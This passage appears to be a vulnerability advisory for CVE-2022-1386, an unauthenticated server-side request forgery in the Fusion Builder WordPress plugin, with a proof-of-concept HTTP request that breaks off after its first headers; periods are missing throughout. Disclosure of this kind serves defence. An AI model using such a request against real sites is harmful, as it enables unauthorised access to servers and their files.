CVE-2022-1386 - Fusion Builder < 362 - Unauthenticated SSRF Description Fusion Builder is a WordPress plugin that allows users to create and edit pages using a drag-and-drop interface It is vulnerable to an unauthenticated SSRF that allows an attacker to read any file on the server Proof of Concept Request: POST /wp-admin/admin-ajaxphp HTTP/11 Host: examplecom Us